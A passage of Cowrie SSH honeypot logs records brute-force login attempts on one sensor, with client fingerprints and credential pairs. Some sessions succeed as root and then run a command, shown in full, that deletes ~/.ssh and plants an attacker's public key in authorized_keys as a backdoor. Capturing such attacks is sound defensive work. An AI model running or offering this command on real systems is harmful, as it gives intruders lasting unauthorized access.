{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:03:54.025089Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:54.296589Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:03:54.854546Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:03:54.855301Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:03:55.127355Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:55.128320Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56940,"dst_ip":"1.2.3.4","dst_port":22,"session":"e08fe5b76431","protocol":"ssh","message":"New connection: 212.227.235.229:56940 (1.2.3.4:22) [session: e08fe5b76431]","sensor":"my-vps","timestamp":"2025-08-26T05:03:55.396187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:55.397207Z","src_ip":"212.227.235.229","session":"e08fe5b76431"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:55.666685Z","src_ip":"212.227.235.229","session":"e08fe5b76431"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":61101,"dst_ip":"1.2.3.4","dst_port":22,"session":"257df54c0e1e","protocol":"ssh","message":"New connection: 80.94.95.112:61101 (1.2.3.4:22) [session: 257df54c0e1e]","sensor":"my-vps","timestamp":"2025-08-26T05:03:56.597373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T05:03:56.598336Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T05:03:56.628673Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:56.784269Z","src_ip":"212.227.235.229","session":"e08fe5b76431"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terrence","message":"login attempt [admin/terrence] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:56.834539Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terrance","message":"login attempt [admin/terrance] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:57.866521Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:58.056201Z","src_ip":"212.227.235.229","session":"e08fe5b76431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56942,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cb0fe9c353b","protocol":"ssh","message":"New connection: 212.227.235.229:56942 (1.2.3.4:22) [session: 2cb0fe9c353b]","sensor":"my-vps","timestamp":"2025-08-26T05:03:58.323723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:58.324470Z","src_ip":"212.227.235.229","session":"2cb0fe9c353b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:58.593810Z","src_ip":"212.227.235.229","session":"2cb0fe9c353b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"taytay","message":"login attempt [admin/taytay] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:58.898110Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:03:59.710387Z","src_ip":"212.227.235.229","session":"2cb0fe9c353b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"system1","message":"login attempt [admin/system1] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:59.930321Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:59.981105Z","src_ip":"212.227.235.229","session":"2cb0fe9c353b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:59.982833Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sunbeam","message":"login attempt [admin/sunbeam] failed","sensor":"my-vps","timestamp":"2025-08-26T05:04:00.963387Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:04:01.996559Z","src_ip":"80.94.95.112","session":"257df54c0e1e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:04:04.235942Z","src_ip":"212.227.235.229","session":"d018ac8b4b87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46064,"dst_ip":"1.2.3.4","dst_port":22,"session":"8817995298b5","protocol":"ssh","message":"New connection: 212.227.235.229:46064 (1.2.3.4:22) [session: 8817995298b5]","sensor":"my-vps","timestamp":"2025-08-26T05:04:24.084524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:04:24.435865Z","src_ip":"212.227.235.229","session":"8817995298b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:04:24.436597Z","src_ip":"212.227.235.229","session":"8817995298b5"}
{"eventid":"cowrie.login.success","username":"root","password":"Kovidh@123","message":"login attempt [root/Kovidh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:04:27.757534Z","src_ip":"212.227.235.229","session":"8817995298b5"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:04:28.476681Z","src_ip":"212.227.235.229","session":"8817995298b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60154,"dst_ip":"1.2.3.4","dst_port":22,"session":"3744b0b4479c","protocol":"ssh","message":"New connection: 212.227.235.229:60154 (1.2.3.4:22) [session: 3744b0b4479c]","sensor":"my-vps","timestamp":"2025-08-26T05:04:47.610393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:04:47.611346Z","src_ip":"212.227.235.229","session":"3744b0b4479c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:04:53.614051Z","src_ip":"212.227.235.229","session":"3744b0b4479c"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:04:53.616600Z","src_ip":"212.227.235.229","session":"3744b0b4479c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52082,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7c2ef195cf5","protocol":"ssh","message":"New connection: 217.72.205.35:52082 (1.2.3.4:22) [session: a7c2ef195cf5]","sensor":"my-vps","timestamp":"2025-08-26T05:05:14.584274Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:05:14.585930Z","src_ip":"217.72.205.35","session":"a7c2ef195cf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42086,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a2ce8d89eab","protocol":"ssh","message":"New connection: 212.227.235.229:42086 (1.2.3.4:22) [session: 0a2ce8d89eab]","sensor":"my-vps","timestamp":"2025-08-26T05:06:09.186905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:06:09.187847Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:06:09.438839Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.login.success","username":"root","password":"Tx123456.","message":"login attempt [root/Tx123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:06:10.483321Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:06:11.043443Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:06:11.044094Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:06:11.045377Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:06:11.298465Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:06:11.859385Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:06:11.860094Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:06:12.113257Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:06:12.114244Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42090,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e66a487164e","protocol":"ssh","message":"New connection: 212.227.235.229:42090 (1.2.3.4:22) [session: 1e66a487164e]","sensor":"my-vps","timestamp":"2025-08-26T05:06:12.367737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:06:12.368664Z","src_ip":"212.227.235.229","session":"1e66a487164e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:06:12.627954Z","src_ip":"212.227.235.229","session":"1e66a487164e"}
